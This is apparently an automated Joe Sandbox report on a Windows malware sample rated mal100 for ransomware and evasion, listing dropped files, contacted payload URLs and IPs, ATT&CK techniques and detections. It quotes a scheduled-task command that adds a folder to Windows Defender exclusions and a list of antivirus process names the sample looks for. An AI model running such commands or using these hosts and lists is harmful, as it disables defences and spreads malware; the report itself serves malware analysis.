Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,3_2_00000001400042B0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,3_2_0000000140003F80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		1
Credential API Hooking		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		43
Windows Service		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		21
Input Capture		1
Account Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts11
Scheduled Task/Job		11
Scheduled Task/Job		1
Access Token Manipulation		1
Abuse Elevation Control Mechanism		Security Account Manager1
System Service Discovery		SMB/Windows Admin Shares21
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution		1
Registry Run Keys / Startup Folder		43
Windows Service		41
Obfuscated Files or Information		NTDS5
File and Directory Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		11
Software Packing		LSA Secrets224
System Information Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
Scheduled Task/Job		1
DLL Side-Loading		Cached Domain Credentials1
Query Registry		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		32
Masquerading		DCSync24
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem2
Process Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow111
Virtualization/Sandbox Evasion		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587272 Sample: 2873466535874-68348745.02.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 83 upitem.oss-cn-hangzhou.aliyuncs.com 2->83 85 ufozdv.net 2->85 87 8 other IPs or domains 2->87 97 Suricata IDS alerts for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Antivirus detection for dropped file 2->101 103 11 other signatures 2->103 9 9afrYB.exe 36 2->9         started        14 2873466535874-68348745.02.exe 1 24 2->14         started        16 9afrYB.exe 2->16         started        18 16 other processes 2->18 signatures3 process4 dnsIp5 93 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49982, 49983 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->93 67 C:\Program Files (x86)\bmaosk\tbcore3U.dll, PE32 9->67 dropped 69 C:\Program Files (x86)\bmaosk\bmaosk.exe, PE32 9->69 dropped 71 C:\Program Files (x86)\5phaM8\tbcore3U.dll, PE32 9->71 dropped 79 13 other malicious files 9->79 dropped 115 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->115 117 Found direct / indirect Syscall (likely to bypass EDR) 9->117 20 bmaosk.exe 10 26 9->20         started        25 cmd.exe 1 9->25         started        27 5phaM8.exe 9->27         started        35 4 other processes 9->35 95 sc-2c8q.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.42, 443, 49704, 49705 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->95 73 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->73 dropped 75 C:\Users\user\Documents\vselog.dll, PE32+ 14->75 dropped 77 C:\Users\user\Documents\9afrYB.exe, PE32+ 14->77 dropped 81 4 other malicious files 14->81 dropped 119 Drops PE files to the document folder of the user 14->119 121 Sample is not signed and drops a device driver 14->121 123 Writes many files with high entropy 14->123 125 Tries to detect virtualization through RDTSC time measurements 16->125 127 Antivirus detection for dropped file 18->127 129 Machine Learning detection for dropped file 18->129 131 Uses cmd line tools excessively to alter registry or file data 18->131 133 Switches to a custom stack to bypass stack traces 18->133 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 89 8.217.59.222, 49991, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->89 91 sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.103, 443, 60499, 60500 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->91 59 C:\ProgramData\kfbe6yYK.exe, PE32 20->59 dropped 61 C:\ProgramDatasnjLDMo\9eYJWFQF.exe, PE32 20->61 dropped 63 C:\Program Files (x86)\...\tbcore3U.dll, PE32 20->63 dropped 65 9 other malicious files 20->65 dropped 105 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->105 107 Creates an undocumented autostart registry key 20->107 39 cmd.exe 20->39         started        109 Uses cmd line tools excessively to alter registry or file data 25->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 25->111 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        45 schtasks.exe 1 25->45         started        47 schtasks.exe 1 25->47         started        113 Adds extensions / path to Windows Defender exclusion list (Registry) 29->113 49 conhost.exe 35->49         started        51 conhost.exe 35->51         started        53 conhost.exe 35->53         started        55 9 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2873466535874-68348745.02.exe14%VirustotalBrowse
2873466535874-68348745.02.exe3%ReversingLabs
2873466535874-68348745.02.exe100%AviraHEUR/AGEN.1316962

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\kfbe6yYK.exe100%AviraHEUR/AGEN.1315326
C:\Program Files (x86)\5phaM8\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\5phaM8\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\Program Files (x86)\Z93E12i3\tbcore3U.dll100%AviraTR/Redcap.vdzex
C:\ProgramData\kfbe6yYK.exe100%Joe Sandbox ML
C:\Program Files (x86)\5phaM8\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\5phaM8\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\Z93E12i3\tbcore3U.dll100%Joe Sandbox ML
C:\Program Files (x86)\5phaM8\5phaM8.exe0%ReversingLabs
C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe0%ReversingLabs
C:\Program Files (x86)\bmaosk\bmaosk.exe0%ReversingLabs
C:\Users\user\Documents\9afrYB.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifQ0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifJ0%Avira URL Cloudsafe
http://www.indigorose.com/route.php?pid=suf60buy0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png0%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.png0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifj0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gif70%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifx0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gif70%Avira URL Cloudsafe
https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.png0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifhttps://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://tjgohh.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    		high
    sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
    		118.178.60.103
    		truefalse
      		high
      sc-2c8q.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
      		39.103.20.42
      		truefalse
        		unknown
        ufozdv.net
        		unknown
        		unknownfalse
          		unknown
          tjgohh.oss-cn-beijing.aliyuncs.com
          		unknown
          		unknownfalse
            		unknown
            upitem.oss-cn-hangzhou.aliyuncs.com
            		unknown
            		unknownfalse
              		unknown
              22mm.oss-cn-hangzhou.aliyuncs.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                  		high
                  https://tjgohh.oss-cn-beijing.aliyuncs.com/a.giffalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tjgohh.oss-cn-beijing.aliyuncs.com/d.giffalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tjgohh.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.pngfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tjgohh.oss-cn-beijing.aliyuncs.com/s.datfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tjgohh.oss-cn-beijing.aliyuncs.com/c.giffalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                    		high
                    https://tjgohh.oss-cn-beijing.aliyuncs.com/i.datfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                      		high
                      https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                        		high
                        https://tjgohh.oss-cn-beijing.aliyuncs.com/b.giffalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                          		high
                          https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifJ2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.indigorose.com/route.php?pid=suf60buy9eYJWFQF.exe, 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifQ2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.thawte.com0189atohci.sys.0.dr, 9afrYB.exe.0.drfalse
                              		high
                              http://www.symauth.com/cps0(9afrYB.exe.0.drfalse
                                		high
                                https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifj2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gif72873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, 9afrYB.exe.0.drfalse
                                  		high
                                  https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifx2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.symauth.com/rpa009afrYB.exe.0.drfalse
                                    		high
                                    https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gif72873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifhttps://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifhttp2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    118.178.60.9
                                    		sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                    8.217.59.222
                                    		unknownSingapore
                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                    39.103.20.42
                                    		sc-2c8q.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                    118.178.60.103
                                    		sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1587272
                                    Start date and time:2025-01-10 02:25:13 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 12m 56s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:55
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:2873466535874-68348745.02.exe
                                    Detection:MAL
                                    Classification:mal100.rans.evad.winEXE@75/47@32/4
                                    EGA Information:
                                    • Successful, ratio: 62.5%
                                    HCA Information:
                                    • Successful, ratio: 88%
                                    • Number of executed functions: 58
                                    • Number of non-executed functions: 346
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 9afrYB.exe, PID 1600 because there are no executed function
                                    • Execution Graph export aborted for target bmaosk.exe, PID 1220 because there are no executed function
                                    • Execution Graph export aborted for target kfbe6yYK.exe, PID 5784 because there are no executed function
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:26:36Task SchedulerRun new task: Dndnb path: C:\Users\user\Documents\9afrYB.exe
                                    02:27:15Task SchedulerRun new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                    02:27:45Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 aARdp path: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                    02:27:45Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 cdUaB path: C:\Program Files (x86)\bmaosk\bmaosk.exe
                                    02:29:34Task SchedulerRun new task: Interface Powerful Empowering path: kfbe6yYK.exe
                                    02:29:41Task SchedulerRun new task: Elevate Empowering With Stay path: 9eYJWFQF.exe
                                    20:26:07API Interceptor3x Sleep call for process: 2873466535874-68348745.02.exe modified
                                    20:27:42API Interceptor14269x Sleep call for process: 9afrYB.exe modified
                                    20:27:43API Interceptor100246x Sleep call for process: bmaosk.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    118.178.60.92362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                      2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                          23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                            287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                              2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                  2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                    45631.exeGet hashmaliciousNitolBrowse
                                                      0000000000000000.exeGet hashmaliciousNitolBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        45631.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        0000000000000000.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://199.188.109.181Get hashmaliciousUnknownBrowse
                                                        • 47.254.187.72
                                                        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 8.214.203.178
                                                        6.elfGet hashmaliciousUnknownBrowse
                                                        • 8.222.188.75
                                                        Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                        • 47.246.158.153
                                                        123.exeGet hashmaliciousMetasploitBrowse
                                                        • 47.90.142.15
                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 8.222.72.249
                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 8.219.224.17
                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                        • 8.220.214.139
                                                        3.elfGet hashmaliciousUnknownBrowse
                                                        • 147.139.100.19
                                                        2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                        • 8.210.66.183
                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdarmv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 47.116.93.193
                                                        3.elfGet hashmaliciousUnknownBrowse
                                                        • 47.113.16.150
                                                        armv7l.elfGet hashmaliciousUnknownBrowse
                                                        • 8.181.124.11
                                                        THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 139.242.78.130
                                                        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 47.114.96.229
                                                        Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 8.140.140.254
                                                        k2vUsu5VZ5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 8.167.197.133
                                                        sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 8.182.192.34
                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdarmv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 47.116.93.193
                                                        3.elfGet hashmaliciousUnknownBrowse
                                                        • 47.113.16.150
                                                        armv7l.elfGet hashmaliciousUnknownBrowse
                                                        • 8.181.124.11
                                                        THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 139.242.78.130
                                                        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 47.114.96.229
                                                        Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 8.140.140.254
                                                        k2vUsu5VZ5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 8.167.197.133
                                                        sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 8.182.192.34
                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdarmv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 47.116.93.193
                                                        3.elfGet hashmaliciousUnknownBrowse
                                                        • 47.113.16.150
                                                        armv7l.elfGet hashmaliciousUnknownBrowse
                                                        • 8.181.124.11
                                                        THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 139.242.78.130
                                                        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 47.114.96.229
                                                        Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 8.140.140.254
                                                        k2vUsu5VZ5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 47.121.190.121
                                                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 8.167.197.133
                                                        sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 8.182.192.34

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
